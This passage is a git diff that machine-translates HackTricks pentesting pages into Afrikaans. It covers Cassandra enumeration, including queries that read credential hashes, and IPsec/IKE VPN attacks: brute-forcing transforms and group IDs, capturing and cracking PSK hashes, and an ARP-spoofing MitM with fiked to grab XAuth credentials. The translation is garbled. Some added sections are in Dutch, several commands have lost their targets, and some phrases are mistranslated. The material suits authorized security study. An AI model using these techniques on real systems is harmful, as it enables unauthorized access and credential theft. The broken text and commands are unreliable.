-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Apache Cassandra** is a **highly scalable**, **high-performance** distributed database designed to handle **large amounts of data** across many **commodity servers**, providing **high availability** with no **single point of failure**. It is a type of **NoSQL database**. +**Apache Cassandra** is 'n **hoogs skaalbare**, **hoë prestasie** verspreide databasis wat ontwerp is om **groot hoeveelhede data** oor baie **gewone bedieners** te hanteer, en **hoë beskikbaarheid** te bied sonder **enige enkele foutpunt**. Dit is 'n tipe **NoSQL-databasis**. -In several cases, you may find that Cassandra accepts **any credentials** (as there aren't any configured) and this could potentially allow an attacker to **enumerate** the database. - -**Default port:** 9042,9160 +In verskeie gevalle mag jy vind dat Cassandra **enige geloofsbriewe** aanvaar (aangesien daar geen geconfigureer is nie) en dit kan 'n aanvaller moontlik in staat stel om die databasis te **opnoem**. +**Verstekpoort:** 9042,9160 ``` PORT STATE SERVICE REASON 9042/tcp open cassandra-native Apache Cassandra 3.10 or later (native protocol versions 3/v3, 4/v4, 5/v5-beta) 9160/tcp open cassandra syn-ack ``` +### Handleiding -## Enumeration +#### Poortscanning -### Manual +Voer een poortscan uit om open poorten op het doelsysteem te identificeren. Dit kan worden gedaan met behulp van tools zoals Nmap of Masscan. Richt de scan op de standaardpoorten die door Cassandra worden gebruikt, zoals poort 9042 voor de CQL-native transport. +``` +nmap -p 9042 +``` + +#### Banner Grabbing + +Gebruik een tool zoals Telnet of Netcat om de banner van de Cassandra-service op te halen. Dit kan informatie onthullen over de versie van Cassandra die wordt uitgevoerd, wat nuttig kan zijn bij het identificeren van kwetsbaarheden. + +``` +telnet 9042 +``` + +### Automatisch + +#### NSE-scripts + +Nmap heeft enkele NSE-scripts die specifiek zijn ontworpen voor het scannen van Cassandra-services. Deze scripts kunnen worden uitgevoerd met de volgende opdracht: + +``` +nmap -p 9042 --script cassandra* +``` + +#### Metasploit-module + +Metasploit heeft ook een module genaamd `auxiliary/scanner/cassandra/cassandra_enum` die kan worden gebruikt om Cassandra-services te scannen en informatie te verzamelen. + +``` +use auxiliary/scanner/cassandra/cassandra_enum +set RHOSTS +run +``` ```bash pip install cqlsh cqlsh @@ -46,32 +77,29 @@ SELECT * from logdb.user_auth; #Can contain credential hashes SELECT * from logdb.user; SELECT * from configuration."config"; ``` +### Outomaties -### Automated - -There aren't much options here and nmap doesn't obtain much info - +Daar is nie baie opsies hier nie en nmap verkry nie baie inligting nie. ```bash nmap -sV --script cassandra-info -p ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#cassandra) ### **Shodan** `port:9160 Cluster`\ -`port:9042 "Invalid or unsupported protocol version"` +`port:9042 "Ongeldige of nie-ondersteunde protokolverise"`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/network-services-pentesting/ipsec-ike-vpn-pentesting.md index 5d3587afc..6e0f01c69 100644 --- a/network-services-pentesting/ipsec-ike-vpn-pentesting.md +++ b/network-services-pentesting/ipsec-ike-vpn-pentesting.md @@ -2,41 +2,40 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Basic Information +## Basiese Inligting -**IPsec** is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions. +**IPsec** word algemeen erken as die belangrikste tegnologie vir die beveiliging van kommunikasie tussen netwerke (LAN-to-LAN) en vanaf afgeleë gebruikers na die netwerkgateway (afgeleë toegang), en dien as die ruggraat vir ondernemings-VPN-oplossings. -The establishment of a **security association (SA)** between two points is managed by **IKE**, which operates under the umbrella of ISAKMP, a protocol designed for the authentication and key exchange. This process unfolds in several phases: +Die vestiging van 'n **sekuriteitsvereniging (SA)** tussen twee punte word bestuur deur **IKE**, wat onder die beskerming van ISAKMP opereer, 'n protokol wat ontwerp is vir die outentifikasie en sleuteluitruiling. Hierdie proses ontvou in verskeie fases: -- **Phase 1:** A secure channel is created between two endpoints. This is achieved through the use of a Pre-Shared Key (PSK) or certificates, employing either main mode, which involves three pairs of messages, or **aggressive mode**. -- **Phase 1.5:** Though not mandatory, this phase, known as the Extended Authentication Phase, verifies the identity of the user attempting to connect by requiring a username and password. -- **Phase 2:** This phase is dedicated to negotiating the parameters for securing data with **ESP** and **AH**. It allows for the use of algorithms different from those in Phase 1 to ensure **Perfect Forward Secrecy (PFS)**, enhancing security. +- **Fase 1:** 'n Veilige kanaal word geskep tussen twee eindpunte. Dit word bereik deur die gebruik van 'n Pre-Shared Key (PSK) of sertifikate, deur óf hoofmodus, wat drie pare boodskappe betrek, óf **aggressiewe modus**. +- **Fase 1.5:** Alhoewel dit nie verpligtend is nie, verifieer hierdie fase, bekend as die Uitgebreide Outentifikasiefase, die identiteit van die gebruiker wat probeer koppel deur 'n gebruikersnaam en wagwoord te vereis. +- **Fase 2:** Hierdie fase is gewy aan die onderhandeling van die parameters vir die beveiliging van data met **ESP** en **AH**. Dit maak die gebruik van algoritmes moontlik wat verskil van dié in Fase 1 om **Perfect Forward Secrecy (PFS)** te verseker, wat die sekuriteit verbeter. -**Default port:** 500/udp - -## **Discover** the service using nmap +**Verstekpoort:** 500/udp +## **Ontdek** die diens met behulp van nmap ``` root@bt:~# nmap -sU -p 500 172.16.21.200 Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST @@ -46,149 +45,131 @@ PORT STATE SERVICE 500/udp open isakmp MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems) ``` +## **Om 'n geldige transformasie te vind** -## **Finding a valid transformation** +Die IPSec-konfigurasie kan slegs voorberei word om een of 'n paar transformasies te aanvaar. 'n Transformasie is 'n kombinasie van waardes. **Elke transformasie** bevat 'n aantal eienskappe soos DES of 3DES as die **enkripsie-algoritme**, SHA of MD5 as die **integriteitsalgoritme**, 'n vooraf gedeelde sleutel as die **outentiseringsmetode**, Diffie-Hellman 1 of 2 as die sleutel **verspreidingsalgoritme** en 28800 sekondes as die **lewensduur**. -The IPSec configuration can be prepared only to accept one or a few transformations. A transformation is a combination of values. **Each transform** contains a number of attributes like DES or 3DES as the **encryption algorithm**, SHA or MD5 as the **integrity algorithm**, a pre-shared key as the **authentication type**, Diffie-Hellman 1 or 2 as the key **distribution algorithm** and 28800 seconds as the **lifetime**. - -Then, the first thing that you have to do is to **find a valid transformation**, so the server will talk to you. To do so, you can use the tool **ike-scan**. By default, Ike-scan works in main mode, and sends a packet to the gateway with an ISAKMP header and a single proposal with **eight transforms inside it**. - -Depending on the response you can obtain some information about the endpoint: +Die eerste ding wat jy moet doen, is om 'n geldige transformasie te vind, sodat die bediener met jou sal praat. Jy kan die hulpmiddel **ike-scan** gebruik om dit te doen. Standaard werk Ike-scan in hoofmodus en stuur 'n pakkie na die hekgat met 'n ISAKMP-kop en 'n enkele voorstel met **agt transformasies daarin**. +Afhanklik van die respons kan jy inligting oor die eindpunt verkry: ``` root@bt:~# ike-scan -M 172.16.21.200 Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 172.16.21.200 Main Mode Handshake returned - HDR=(CKY-R=d90bf054d6b76401) - SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) - VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation) - +HDR=(CKY-R=d90bf054d6b76401) +SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) +VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation) + Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify ``` +Soos u in die vorige antwoord kan sien, is daar 'n veld genaamd **AUTH** met die waarde **PSK**. Dit beteken dat die VPN gekonfigureer is met 'n voorgeskrewe sleutel (en dit is regtig goed vir 'n pentester).\ +**Die waarde van die laaste lyn is ook baie belangrik:** -As you can see in the previous response, there is a field called **AUTH** with the value **PSK**. This means that the vpn is configured using a preshared key (and this is really good for a pentester).\ -**The value of the last line is also very important:** +* _0 teruggekeerde handdruk; 0 teruggekeerde kennisgewing:_ Dit beteken die teiken is **nie 'n IPsec-hekwerk** nie. +* _**1 teruggekeerde handdruk; 0 teruggekeerde kennisgewing:**_ Dit beteken die **teiken is gekonfigureer vir IPsec en is gewillig om IKE-onderhandeling uit te voer, en een of meer van die voorgestelde transformasies is aanvaarbaar** ( 'n geldige transformasie sal in die uitset vertoon word). +* _0 teruggekeerde handdruk; 1 teruggekeerde kennisgewing:_ VPN-hekwerke reageer met 'n kennisgewing wanneer **geen van die transformasies aanvaarbaar is** (hoewel sommige hekwerke dit nie doen nie, in welke geval verdere analise en 'n hersiene voorstel geprobeer moet word). -* _0 returned handshake; 0 returned notify:_ This means the target is **not an IPsec gateway**. -* _**1 returned handshake; 0 returned notify:**_ This means the **target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable** (a valid transform will be shown in the output). -* _0 returned handshake; 1 returned notify:_ VPN gateways respond with a notify message when **none of the transforms are acceptable** (though some gateways do not, in which case further analysis and a revised proposal should be tried). - -Then, in this case we already have a valid transformation but if you are in the 3rd case, then you need to **brute-force a little bit to find a valid transformation:** - -First of all you need to create all the possible transformations: +In hierdie geval het ons reeds 'n geldige transformasie, maar as u in die 3de geval is, moet u 'n bietjie **brute force** gebruik om 'n geldige transformasie te vind: +Eerstens moet u al die moontlike transformasies skep: ```bash for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done ``` - -And then brute-force each one using ike-scan (this can take several minutes): - +En dan kragtige krag elkeen met behulp van ike-scan (dit kan verskeie minute neem): ```bash while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line ) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt ``` - -If the brute-force didn't work, maybe the server is responding without handshakes even to valid transforms. Then, you could try the same brute-force but using aggressive mode: - +As die brute-force nie werk nie, is dit moontlik dat die bediener selfs sonder handskommunikasie reageer op geldige transformasies. Jy kan dan dieselfde brute-force probeer, maar in aggressiewe modus: ```bash while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line ) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt ``` - -Hopefully **a valid transformation is echoed back**.\ -You can try the **same attack** using [**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py).\ -You could also try to brute force transformations with [**ikeforce**](https://github.com/SpiderLabs/ikeforce): - +Hopelik word **'n geldige transformasie teruggestuur'**.\ +Jy kan die **selfde aanval** probeer met behulp van [**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py).\ +Jy kan ook probeer om transformasies met **ikeforce** te kragtig te breek met [**ikeforce**](https://github.com/SpiderLabs/ikeforce): ```bash ./ikeforce.py # No parameters are required for scan -h for additional help ``` - ![](<../.gitbook/assets/image (109).png>) -In **DH Group: 14 = 2048-bit MODP** and **15 = 3072-bit**\ -**2 = HMAC-SHA = SHA1 (in this case). The `--trans` format is $Enc,$Hash,$Auth,$DH** +In **DH Groep: 14 = 2048-bit MODP** en **15 = 3072-bit**\ +**2 = HMAC-SHA = SHA1 (in hierdie geval). Die `--trans` formaat is $Enc,$Hash,$Auth,$DH** -Cisco indicates to avoid using DH groups 1 and 2 because they're not strong enough. Experts believe that **countries with a lot of resources can easily break the encryption** of data that uses these weak groups. This is done by using a special method that prepares them to crack the codes quickly. Even though it costs a lot of money to set up this method, it allows these powerful countries to read the encrypted data in real time if it's using a group that's not strong (like 1,024-bit or smaller). +Cisco dui aan dat dit beter is om nie DH groepe 1 en 2 te gebruik nie omdat hulle nie sterk genoeg is nie. Kenners glo dat **lande met baie hulpbronne maklik die versleuteling** van data wat hierdie swak groepe gebruik, kan breek. Dit word gedoen deur 'n spesiale metode te gebruik wat hulle voorberei om die kodes vinnig te kraak. Alhoewel dit baie geld kos om hierdie metode op te stel, stel dit hierdie magtige lande in staat om die versleutelde data in werklike tyd te lees as dit 'n groep gebruik wat nie sterk is nie (soos 1,024-bit of kleiner). -### Server fingerprinting +### Server vingerafdruk -Then, you can use ike-scan to try to **discover the vendor** of the device. The tool send an initial proposal and stops replaying. Then, it will **analyze** the **time** difference **between** the received **messages** from the server and the matching response pattern, the pentester can successfully fingerprint the VPN gateway vendor. More over, some VPN servers will use the optional **Vendor ID (VID) payload** with IKE. +Daarna kan jy ike-scan gebruik om te probeer **ontdek wie die vervaardiger** van die toestel is. Die instrument stuur 'n aanvanklike voorstel en stop om te herhaal. Dan sal dit die **tydverskil analiseer** tussen die ontvangste boodskappe van die bediener en die ooreenstemmende responspatroon, sodat die pentester die VPN-hekwerkvervaardiger suksesvol kan identifiseer. Verder sal sommige VPN-bedieners die opsionele **Vendor ID (VID) payload** met IKE gebruik. -**Specify the valid transformation if needed** (using --trans) - -If IKE discover which is the vendor it will print it: +**Spesifiseer die geldige transformasie indien nodig** (deur --trans te gebruik) +As IKE uitvind wie die vervaardiger is, sal dit dit druk: ``` root@bt:~# ike-scan -M --showbackoff 172.16.21.200 Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 172.16.21.200 Main Mode Handshake returned - HDR=(CKY-R=4f3ec84731e2214a) - SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) - VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation) - +HDR=(CKY-R=4f3ec84731e2214a) +SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) +VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation) + IKE Backoff Patterns: - + IP Address No. Recv time Delta Time 172.16.21.200 1 1322286031.744904 0.000000 172.16.21.200 2 1322286039.745081 8.000177 172.16.21.200 3 1322286047.745989 8.000908 172.16.21.200 4 1322286055.746972 8.000983 172.16.21.200 Implementation guess: Cisco VPN Concentrator - + Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify ``` +Dit kan ook bereik word met die nmap-skripsie _**ike-version**_ -This can be also achieve with nmap script _**ike-version**_ +## Die regte ID (groepnaam) vind -## Finding the correct ID (group name) +Om toestemming te hê om die has te kan vasvang, het jy 'n geldige transformasie nodig wat Aggressiewe modus ondersteun en die regte ID (groepnaam). Jy sal waarskynlik nie die geldige groepnaam weet nie, so jy sal dit moet kragtig afdwing.\ +Om dit te doen, sal ek jou 2 metodes aanbeveel: -For being allowed to capture the hash you need a valid transformation supporting Aggressive mode and the correct ID (group name). You probably won't know the valid group name, so you will have to brute-force it.\ -To do so, I would recommend you 2 methods: - -### Bruteforcing ID with ike-scan - -First of all try to make a request with a fake ID trying to gather the hash ("-P"): +### ID kragtig afdwing met ike-scan +Eerstens, probeer 'n versoek maak met 'n vals ID om die has te probeer vasvang ("-P"): ```bash ike-scan -P -M -A -n fakeID ``` - -If **no hash is returned**, then probably this method of brute forcing will work. **If some hash is returned, this means that a fake hash is going to be sent back for a fake ID, so this method won't be reliable** to brute-force the ID. For example, a fake hash could be returned (this happens in modern versions): +As **geen has teruggekeer word nie**, sal hierdie metode van brute forcing waarskynlik werk. **As 'n sekere has teruggekeer word, beteken dit dat 'n vals has teruggestuur gaan word vir 'n vals ID, so hierdie metode sal nie betroubaar wees** om die ID te brute-force nie. Byvoorbeeld, 'n vals has kan teruggestuur word (dit gebeur in moderne weergawes): ![](<../.gitbook/assets/image (110).png>) -But if as I have said, no hash is returned, then you should try to brute-force common group names using ike-scan. +Maar as soos ek gesê het, geen has teruggekeer word nie, moet jy probeer om algemene groepname te brute-force met behulp van ike-scan. -This script **will try to brute-force possible IDs** and will return the IDs where a valid handshake is returned (this will be a valid group name). +Hierdie skrip **sal probeer om moontlike IDs te brute-force** en sal die IDs teruggee waar 'n geldige handshake teruggekeer word (dit sal 'n geldige groepnaam wees). -If you have discovered an specific transformation add it in the ike-scan command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly). - -You can use the[ dictionary of ikeforce](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic) or [the one in seclists](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt) of common group names to brute-force them: +As jy 'n spesifieke transformasie ontdek het, voeg dit by die ike-scan bevel. En as jy verskeie transformasies ontdek het, voel vry om 'n nuwe lus by te voeg om almal te probeer (jy moet almal probeer totdat een van hulle behoorlik werk). +Jy kan die [woordeboek van ikeforce](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic) of [die een in seclists](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt) van algemene groepname gebruik om hulle te brute-force: ```bash while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line ) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt ``` - -Or use this dict (is a combination of the other 2 dicts without repetitions): +Of gebruik hierdie woordeboek (dit is 'n kombinasie van die ander 2 woordeboeke sonder herhalings): {% file src="../.gitbook/assets/vpnIDs.txt" %} -### Bruteforcing ID with Iker +### Bruteforce ID met Iker -[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) also uses **ike-scan** to bruteforce possible group names. It follows it's own method to **find a valid ID based on the output of ike-scan**. +[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) gebruik ook **ike-scan** om moontlike groepname te bruteforce. Dit volg sy eie metode om 'n geldige ID te vind gebaseer op die uitset van ike-scan. -### Bruteforcing ID with ikeforce +### Bruteforce ID met ikeforce -[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) is a tool that can be used to **brute force IDs also**. This tool will **try to exploit different vulnerabilities** that could be used to **distinguish between a valid and a non-valid ID** (could have false positives and false negatives, that is why I prefer to use the ike-scan method if possible). +[**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) is 'n instrument wat gebruik kan word om IDs ook te bruteforce. Hierdie instrument sal probeer om verskillende kwesbaarhede uit te buit wat gebruik kan word om tussen 'n geldige en 'n nie-geldige ID te onderskei (dit kan vals positiewe en vals negatiewe hê, daarom verkies ek om die ike-scan metode te gebruik as dit moontlik is). -By default **ikeforce** will send at the beginning some random ids to check the behaviour of the server and determinate the tactic to use. +Standaard sal **ikeforce** aan die begin 'n paar lukrake IDs stuur om die gedrag van die bediener te toets en die taktiek te bepaal. -* The **first method** is to brute-force the group names by **searching** for the information **Dead Peer Detection DPD** of Cisco systems (this info is only replayed by the server if the group name is correct). -* The **second method** available is to **checks the number of responses sent to each try** because sometimes more packets are sent when the correct id is used. -* The **third method** consist on **searching for "INVALID-ID-INFORMATION" in response to incorrect ID**. -* Finally, if the server does not replay anything to the checks, **ikeforce** will try to brute force the server and check if when the correct id is sent the server replay with some packet.\ - Obviously, the goal of brute forcing the id is to get the **PSK** when you have a valid id. Then, with the **id** and **PSK** you will have to bruteforce the XAUTH (if it is enabled). - -If you have discovered an specific transformation add it in the ikeforce command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly). +* Die **eerste metode** is om die groepname te bruteforce deur te soek na die inligting **Dead Peer Detection DPD** van Cisco-stelsels (hierdie inligting word slegs deur die bediener herhaal as die groepnaam korrek is). +* Die **tweede metode** wat beskikbaar is, is om die aantal antwoorde wat na elke poging gestuur word, te **kontroleer**, omdat soms meer pakkies gestuur word wanneer die korrekte ID gebruik word. +* Die **derde metode** behels die soeke na "INVALID-ID-INFORMATION" as antwoord op 'n ongeldige ID. +* As die bediener natuurlik niks antwoord op die toetse nie, sal **ikeforce** probeer om die bediener te bruteforce en te kyk of die bediener antwoord met 'n paar pakkies wanneer die korrekte ID gestuur word.\ +Die doel van die bruteforce van die ID is natuurlik om die **PSK** te kry as jy 'n geldige ID het. Dan sal jy met die **ID** en **PSK** die XAUTH moet bruteforce (as dit geaktiveer is). +As jy 'n spesifieke transformasie ontdek het, voeg dit by die ikeforce-opdrag. En as jy verskeie transformasies ontdek het, voel vry om 'n nuwe lus by te voeg om almal te probeer (jy moet almal probeer totdat een van hulle behoorlik werk). ```bash git clone https://github.com/SpiderLabs/ikeforce.git pip install 'pyopenssl==17.2.0' #It is old and need this version of the library @@ -197,64 +178,54 @@ pip install 'pyopenssl==17.2.0' #It is old and need this version of the library ```bash ./ikeforce.py -e -w ./wordlists/groupnames.dic ``` +### Snuffel ID -### Sniffing ID - -(From the book **Network Security Assessment: Know Your Network**): It is also possible to obtain valid usernames by sniffing the connection between the VPN client and server, as the first aggressive mode packet containing the client ID is sent in the clear +(Uit die boek **Netwerk Sekuriteitsassessering: Ken Jou Netwerk**): Dit is ook moontlik om geldige gebruikersname te verkry deur die snuffel van die verbinding tussen die VPN-kliënt en bediener, aangesien die eerste aggressiewe modus-pakket wat die kliënt-ID bevat, in die oop gestuur word. ![](<../.gitbook/assets/image (111).png>) -## Capturing & cracking the hash - -Finally, If you have found a **valid transformation** and the **group name** and if the **aggressive mode is allowed**, then you can very easily grab the crackable hash: +## Vaslegging en kraak van die has +Uiteindelik, as jy 'n **geldige transformasie** en die **groepnaam** gevind het en as die **aggressiewe modus toegelaat word**, kan jy baie maklik die kraakbare has gryp: ```bash ike-scan -M -A -n --pskcrack=hash.txt #If aggressive mode is supported and you know the id, you can get the hash of the passwor ``` +Die hash sal binne _hash.txt_ gestoor word. -The hash will be saved inside _hash.txt_. - -You can use **psk-crack**, **john** (using [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py)) and **hashcat** to **crack** the hash: - +Jy kan **psk-crack**, **john** (deur gebruik te maak van [**ikescan2john.py**](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py)) en **hashcat** gebruik om die hash te **kraak**: ```bash psk-crack -d psk.txt ``` - ## **XAuth** -**Aggressive mode IKE** combined with a **Pre-Shared Key (PSK)** is commonly employed for **group authentication** purposes. This method is augmented by **XAuth (Extended Authentication)**, which serves to introduce an additional layer of **user authentication**. Such authentication typically leverages services like **Microsoft Active Directory**, **RADIUS**, or comparable systems. +**Aggressiewe modus IKE** saam met 'n **Pre-Shared Key (PSK)** word algemeen gebruik vir **groepverifikasie** doeleindes. Hierdie metode word versterk deur **XAuth (Uitgebreide Verifikasie)**, wat 'n addisionele laag van **gebruikersverifikasie** inbring. Sulke verifikasie maak gewoonlik gebruik van dienste soos **Microsoft Active Directory**, **RADIUS**, of vergelykbare stelsels. -Transitioning to **IKEv2**, a notable shift is observed where **EAP (Extensible Authentication Protocol)** is utilized in lieu of **XAuth** for the purpose of authenticating users. This change underscores an evolution in authentication practices within secure communication protocols. +By die oorgang na **IKEv2**, word 'n merkbare verskuiwing waargeneem waar **EAP (Uitbreibare Verifikasieprotokol)** gebruik word in plaas van **XAuth** om gebruikers te verifieer. Hierdie verandering beklemtoon 'n evolusie in verifikasiepraktyke binne veilige kommunikasieprotokolle. -### Local network MitM to capture credentials - -So you can capture the data of the login using _fiked_ and see if there is any default username (You need to redirect IKE traffic to `fiked` for sniffing, which can be done with the help of ARP spoofing, [more info](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)). Fiked will act as a VPN endpoint and will capture the XAuth credentials: +### Plaaslike netwerk MitM om geloofsbriewe vas te vang +Sodat jy die data van die aanmelding kan vasvang, kan jy _fiked_ gebruik en sien of daar enige verstek gebruikersnaam is (Jy moet IKE-verkeer na `fiked` 